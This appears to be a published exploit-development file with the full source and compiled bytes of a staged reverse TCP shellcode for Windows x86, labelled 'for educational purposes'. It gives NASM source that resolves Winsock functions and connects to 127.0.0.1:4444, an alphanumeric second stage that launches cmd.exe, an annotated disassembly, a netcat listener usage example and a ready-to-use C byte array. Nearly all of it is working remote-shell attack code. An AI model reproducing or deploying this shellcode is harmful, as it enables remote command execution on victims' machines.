344 lines
No EOL
8.4 KiB
NASM
344 lines
No EOL
8.4 KiB
NASM
########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
|
|
########### Author: Snir Levi, Applitects #############
|
|
## 332 Bytes ##
|
|
## For Educational Purposes Only ##
|
|
|
|
Date: 01.03.17
|
|
Author: Snir Levi
|
|
Email: snircontact@gmail.com
|
|
https://github.com/snir-levi/
|
|
|
|
IP - 127.0.0.1
|
|
PORT - 4444
|
|
|
|
Tested on:
|
|
Windows 7
|
|
Windows 10
|
|
###Usage###
|
|
Victim Executes the first stage shellcode, and opens tcp connection
|
|
After Connection is established, send the Alphanumeric stage to the connection
|
|
|
|
nc -lvp 4444
|
|
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
|
|
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
|
|
|
|
Microsoft Windows [Version 10.0.14393]
|
|
(c) 2016 Microsoft Corporation. All rights reserved.
|
|
|
|
C:\Users\>
|
|
###########
|
|
|
|
|
|
|
|
##Shellcode##
|
|
|
|
|
|
#### Second Stage Alphanumeric shellcode: #####
|
|
|
|
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
|
|
|
|
|
|
R push edx
|
|
P push eax
|
|
hoces push 0x7365636f //oces
|
|
htePr push 0x72506574 //tePr
|
|
hCrea push 0x61657243 //Crea
|
|
T push esp
|
|
Q push ecx
|
|
PX will be replaced with call [esi] (0x16ff)
|
|
L*8 dec esp // offset esp to kernel32.dll Address
|
|
Y pop ecx // ecx = kernel32
|
|
F*4 inc esi -> offset [esi+4]
|
|
PX will be replaced with mov [esi],eax (0x0689)
|
|
N*4 dec esi -> offset [esi]
|
|
j0 push 0x30
|
|
X pop eax
|
|
H*48 dec eax // zeroing eax
|
|
P push eax
|
|
hessA push 0x41737365 //essA (will be null terminated)
|
|
hProc push 0x636f7250 //Proc
|
|
hExit push 0x74697845 //Exit
|
|
T push esp
|
|
Q push ecx
|
|
PX will be replaced with call [esi] (0x16ff)
|
|
F*8 inc esi -> offset [esi+8]
|
|
PX will be replaced with mov [esi],eax (0x0689)
|
|
Z*10 offset stack to &processinfo
|
|
j0 push 0x30
|
|
Y pop ecx
|
|
I*48 dec ecx // zeroing ecx
|
|
T push esp
|
|
X pop eax //eax = &PROCESS_INFORMATION
|
|
Q*4 push ecx //sub esp,16
|
|
W push edi
|
|
W push edi
|
|
W push edi
|
|
Q push ecx
|
|
Q push ecx
|
|
B inc edx
|
|
R push edx
|
|
Q*10 push ecx
|
|
jD push 0x44
|
|
T push esp
|
|
Z pop edx //edx = &STARTUPINFOA
|
|
hexeC push 0x65
|
|
hcmd. push 0x78652e64
|
|
T push esp // &'cmd.exe'
|
|
Y pop ecx
|
|
P push eax // &PROCESS_INFORMATION
|
|
R push edx // &STARTUPINFOA
|
|
j0 push 0x30
|
|
Z pop edx
|
|
J*48 dec edx // zeroing edx
|
|
R*3 push edx
|
|
B inc edx
|
|
R push edx
|
|
J dec edx
|
|
R*2 push edx
|
|
Q push ecx ; &'cmd.exe'
|
|
R push edx
|
|
A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated
|
|
N*4 dec esi //offset [esi+4] to CreateProccesA
|
|
S push ebx ; return address
|
|
|
|
|
|
|
|
## First Stage Shellcode ##
|
|
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
|
|
_start:
|
|
xor eax,eax
|
|
push eax ; null terminator for createProcA
|
|
|
|
mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
|
|
mov eax,[eax+0xc]
|
|
mov esi,[eax+0x14]
|
|
lodsd
|
|
xchg esi,eax
|
|
lodsd
|
|
mov ebx,[eax+0x10] ; kernel32
|
|
|
|
mov ecx,[ebx+0x3c] ; DOS->elf_anew
|
|
add ecx, ebx; Skip to PE start
|
|
mov ecx, [ecx+0x78] ; offset to export table
|
|
add ecx,ebx ; kernel32 image_export_dir
|
|
|
|
mov esi,[ecx+0x20] ; Name Table
|
|
add esi,ebx
|
|
|
|
xor edx,edx
|
|
|
|
getProcAddress:
|
|
inc edx
|
|
lodsd
|
|
add eax,ebx
|
|
cmp dword [eax],'GetP'
|
|
jne getProcAddress
|
|
cmp dword [eax+4],'rocA'
|
|
jne getProcAddress
|
|
|
|
;---Function Adresses Chain----
|
|
;[esi] GetProcAddress
|
|
;[esi+12] WSAstartup
|
|
;[esi+16] WSASocketA
|
|
;[esi+20] connect
|
|
;[esi+24] recv
|
|
;[esi+28] kernel32
|
|
|
|
;Alphanumeric stage store:
|
|
;[esi+4] CreateProcessA
|
|
;[esi+8] ExitProccess
|
|
|
|
|
|
mov esi,[ecx+0x1c] ; Functions Addresses Chain
|
|
add esi,ebx
|
|
mov edx,[esi+edx*4]
|
|
add edx,ebx ; GetProcAddress
|
|
|
|
sub esp, 32 ; Buffer for the function addresses chain
|
|
push esp
|
|
pop esi
|
|
mov [esp],edx ; esi offset 0 -> GetProcAddress
|
|
mov [esi+28],ebx ;esi offset 28 -> kernel32
|
|
|
|
;--------winsock2.dll Address--------------
|
|
xor edi,edi
|
|
push edi
|
|
push 0x41797261 ; Ayra
|
|
push 0x7262694c ; rbiL
|
|
push 0x64616f4c ; daoL
|
|
push esp
|
|
push ebx
|
|
|
|
call [esi]
|
|
|
|
;-----ws2_32.dll Address-------
|
|
xor ecx,ecx
|
|
push ecx
|
|
mov cx, 0x3233 ; 0023
|
|
push ecx
|
|
push 0x5f327377 ; _2sw
|
|
push esp
|
|
|
|
call eax
|
|
mov ebp,eax ;ebp = ws2_32.dll
|
|
|
|
;-------WSAstartup Address-------------
|
|
xor ecx,ecx
|
|
push ecx
|
|
mov cx, 0x7075 ; 00up
|
|
push ecx
|
|
push 0x74726174 ; trat
|
|
push 0x53415357 ; SASW
|
|
push esp
|
|
push ebp
|
|
|
|
call [esi]
|
|
mov [esi+12],eax ;esi offset 12 -> WSAstartup
|
|
|
|
;-------WSASocketA Address-------------
|
|
xor ecx,ecx
|
|
push ecx
|
|
mov cx, 0x4174 ; 00At
|
|
push ecx
|
|
push 0x656b636f ; ekco
|
|
push 0x53415357 ; SASW
|
|
push esp
|
|
push ebp
|
|
|
|
call [esi]
|
|
mov [esi+16],eax;esi offset 16 -> WSASocketA
|
|
|
|
;------connect Address-----------
|
|
push edi
|
|
mov ecx, 0x74636565 ; '\0tce'
|
|
shr ecx, 8
|
|
push ecx
|
|
push 0x6e6e6f63 ; 'nnoc'
|
|
push esp
|
|
push ebp
|
|
|
|
call [esi]
|
|
mov [esi+20],eax;esi offset 20 -> connect
|
|
|
|
;------recv Address-------------
|
|
push edi
|
|
push 0x76636572 ;vcer
|
|
push esp
|
|
push ebp
|
|
|
|
call [esi]
|
|
mov [esi+24],eax;esi offset 24 -> recv
|
|
|
|
;------call WSAstartup()----------
|
|
xor ecx,ecx
|
|
sub sp,700
|
|
push esp
|
|
mov cx,514
|
|
push ecx
|
|
call [esi+12]
|
|
|
|
;--------call WSASocket()-----------
|
|
; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
|
|
; IPPROTO_TCP = 6, NULL,
|
|
;(unsigned int)NULL, (unsigned int)NULL);
|
|
|
|
push eax ; if successful, eax = 0
|
|
push eax
|
|
push eax
|
|
mov al,6
|
|
push eax
|
|
mov al,1
|
|
push eax
|
|
inc eax
|
|
push eax
|
|
|
|
call [esi+16]
|
|
xchg eax, edi ; edi = SocketRefernce
|
|
|
|
|
|
;--------call connect----------
|
|
|
|
;struct sockaddr_in {
|
|
; short sin_family;
|
|
; u_short sin_port;
|
|
; struct in_addr sin_addr;
|
|
; char sin_zero[8];
|
|
;};
|
|
|
|
|
|
push byte 0x1
|
|
pop edx
|
|
shl edx, 24
|
|
mov dl, 0x7f ;edx = 127.0.0.1 (hex)
|
|
push edx
|
|
push word 0x5c11; port 4444
|
|
push word 0x2
|
|
|
|
;int connect(
|
|
;_In_ SOCKET s,
|
|
;_In_ const struct sockaddr *name,
|
|
;_In_ int namelen
|
|
;);
|
|
|
|
mov edx,esp
|
|
push byte 16 ; sizeof(sockaddr)
|
|
push edx ; (sockaddr*)
|
|
push edi ; socketReference
|
|
|
|
call [esi+20]
|
|
|
|
|
|
;--------call recv()----------
|
|
|
|
;int recv(
|
|
;_In_ SOCKET s,
|
|
;_Out_ char *buf,
|
|
;_In_ int len,
|
|
;_In_ int flags
|
|
;);
|
|
|
|
|
|
stage:
|
|
push eax
|
|
mov ax,950
|
|
push eax ;buffer length
|
|
push esp
|
|
pop ebp
|
|
sub ebp,eax ; set buffer to [esp-950]
|
|
push ebp ;&buf
|
|
push edi ;socketReference
|
|
|
|
call [esi+24]
|
|
|
|
executeStage:
|
|
xor edx,edx
|
|
mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret
|
|
mov byte [ebp+96],dl ; null terminator to ExitProcess
|
|
mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
|
|
dec ebp
|
|
mov word [ebp+20],0x16ff ; call DWORD [esi]
|
|
mov word [ebp+35],0x0689 ; mov [esi],eax
|
|
mov word [ebp+110],0x16ff; call DWORD [esi]
|
|
mov word [ebp+120],0x0689; mov [esi],eax
|
|
mov ax,0x4173 ; As (CreateProcessA)
|
|
mov ecx,[esi+28] ; ecx = kernel32
|
|
dec dl ;edx = 0x000000ff
|
|
call ebp ; Execute Alphanumeric stage
|
|
executeShell:
|
|
mov [ecx],dl ;null terminator to 'cmd.exe'
|
|
call dword [esi] ;createProcA
|
|
push eax
|
|
call dword [esi+4] ; ExitProccess
|
|
|
|
|
|
|
|
-----------------------
|
|
|
|
unsigned char shellcode[]=
|
|
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04"; |